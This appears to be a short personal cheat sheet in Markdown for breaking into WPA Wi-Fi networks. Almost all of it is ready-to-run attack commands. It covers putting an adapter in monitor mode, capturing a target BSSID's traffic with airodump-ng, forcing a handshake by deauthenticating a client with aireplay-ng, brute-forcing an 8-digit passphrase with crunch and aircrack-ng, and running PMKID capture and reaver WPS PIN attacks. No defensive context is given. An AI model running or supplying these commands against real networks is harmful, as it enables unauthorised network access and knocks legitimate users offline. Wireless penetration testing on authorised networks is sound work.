67 lines
1.1 KiB
Plaintext
67 lines
1.1 KiB
Plaintext
# Monitor mode
|
|
For my RTL8188EUS:
|
|
|
|
```
|
|
ip link set wlanX down
|
|
iw dev wlanX set type monitor
|
|
```
|
|
|
|
# Scan networks
|
|
|
|
All channels:
|
|
```
|
|
airodump-ng wlanX
|
|
```
|
|
Specific channel:
|
|
```
|
|
airodump-ng -c 6 wlanX
|
|
```
|
|
|
|
# Save a capture of chosen BSSID
|
|
|
|
```
|
|
airodump-ng -c 6 --bssid 00:23:B1:82:08:xx -w <filename> wlanX
|
|
```
|
|
|
|
You need to wait for a client to connect, or to deauth it and get the 4-way handshake.
|
|
```
|
|
aireplay-ng -0 1 -a 00:23:B1:82:0C:xx -c D0:37:45:2F:52:xx wlanX
|
|
```
|
|
`-a` is access point
|
|
`-c` is client
|
|
|
|
Then you should have an EAPOL/WPA handshake.
|
|
|
|
# Crack WPA passphrase
|
|
|
|
## For a 8 digits scheme
|
|
|
|
```
|
|
crunch 8 8 0123456789 -s 00000000 | aircrack-ng -w - -b 00:23:B1:82:08:xx <filename>.cap
|
|
```
|
|
|
|
# Wireshark
|
|
|
|
PSK Generator: <https://www.wireshark.org/tools/wpa-psk.html>
|
|
|
|
## PMKID method
|
|
|
|
```
|
|
hcxdumptool -i wlanX -o PMKID --enable_status=1
|
|
```
|
|
|
|
TODO...
|
|
|
|
## WPS method
|
|
|
|
AP must have WPS enabled with a PIN. Not PBC, push button.
|
|
|
|
```
|
|
reaver -i wlanX -b 00:23:B1:82:84:xx
|
|
```
|
|
|
|
## Resources
|
|
|
|
<https://github.com/ZerBea/hcxdumptool>
|
|
<https://github.com/ZerBea/hcxtools>
|
|
<https://wpa-sec.stanev.org/> |